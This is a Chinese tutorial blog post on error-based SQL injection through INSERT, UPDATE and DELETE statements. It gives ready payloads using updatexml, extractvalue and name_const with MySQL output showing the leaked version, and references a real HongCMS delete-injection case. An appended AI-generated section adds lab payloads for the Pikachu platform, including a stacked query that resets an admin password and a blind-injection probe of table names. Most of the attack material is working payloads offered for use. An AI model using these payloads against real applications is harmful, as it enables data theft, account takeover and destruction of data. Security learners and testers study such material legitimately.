insert、update和delete 注入方法

本文深入探讨了SQL注入的多种技巧,不仅限于查询注入,还包括通过insert、update和delete语句进行的注入。文章详细解释了如何利用updatexml、extractvalue和name_const函数进行数据库版本和敏感信息的获取,提供了具体的注入示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。

所有说除了查询之外,所有和数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insert、update和delete的注入方法。

以下均为报错注入,测试数据库版本5.7.21

利用内置函数updatexml、extractvalue或name_const

测试表如下:

一、使用updatexml()函数


UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值
而我们的注入语句为:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

payload:

or updatexml(1,concat(0x7e,(version())),0) or

 

测试 insert注入:

mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入

mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

二、extractvalue()函数

extractvalue() :对XML文档进行查询的函数
其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

payload:

or extractvalue(1,concat(0x7e,database())) or

测试insert注入

mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试update注入:

mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

测试delete注入

mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

三、name_const()函数

name_const(name,value)
返回给定值。 当用来产生一个结果集合列时, name_const()促使该列使用给定名称。

payload

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

测试insert注入

mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试update注入

mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

测试delete注入

mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

参考链接:https://www.cnblogs.com/r00tgrok/p/3854754.html

实战测试:

HongCMS后台在清除表格的时候存在sql注入,即delete注入

详情连接:https://www.freebuf.com/vuls/178316.html

使用updatexml payload

使用extractvalue

使用name_const

### SQL 注入实验教程 #### Insert 注入 在 Pikachu 平台上执行 `INSERT` 类型的 SQL 注入,主要通过构造特定的有效载荷来触发数据库错误并泄露信息。有效载荷通常会利用某些函数(如 `updatexml()`),这些函数会在遇到异常情况时抛出可捕获的信息。 对于 `INSERT` 操作而言,可以构建如下形式的有效载荷: ```sql name' OR updatexml(1, concat(0x7e, database()), 0) OR ' ``` 此语句尝试向表中插入一条新记录的同时调用了 `updatexml()` 函数以期引发 XML 解析器错误从而暴露当前使用的数据库名称[^2]。 #### Update 注入 针对更新操作 (`UPDATE`) 的注入攻击同样依赖于制造条件使目标应用程序返回非预期的结果集或状态码变化。一种常见的做法是在设置字段值的地方嵌入恶意逻辑表达式,进而影响后续的数据处理流程。 假设有一个允许修改用户资料的功能接口,则可以通过提交特制参数来进行测试: ```sql username=admin'; UPDATE users SET password=md5('new_password') WHERE id = '1 -- ``` 这条命令试图更改 ID 为 1 的用户的密码至新的哈希值,并且由于分号的存在使得原查询提前结束而忽略了后面的任何附加字符[^1]。 #### Delete 注入 删除类别的注入往往更加危险因为它可以直接导致数据丢失。当确认某处存在潜在风险点后,应当谨慎行事以免造成不可逆损害。下面给出了一种基于布尔盲注的方式去探测是否存在敏感表格名的方法论实例: ```sql kobe' AND SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='pikachu' LIMIT 0,1), 1, 1) = 'h' # ``` 这里采用的是逐位猜测法,即每次只比较单个字母直至完全匹配整个字符串为止;同时注意使用注释符屏蔽掉原始 SQL 结构以防意外终止事务[^3]。 #### HTTP 头部注入 除了传统的 GET/POST 请求方式外,在 HTTP 协议层面上也可能隐藏着安全缺陷等待被挖掘出来加以利用——这就是所谓的“HTTP Header Injection”。具体到本案例里,就是指将有害指令伪装成正常的请求首部发送给服务器端解析引擎。 一个简单的例子就是在 Referer 或 User-Agent 字段内植入带有恶意链接的内容,以此诱导后台程序按照预设路径执行相应动作。不过需要注意的是实际环境中还需考虑更多因素比如编码转换、转义机制等细节问题才能确保成功实施此类攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值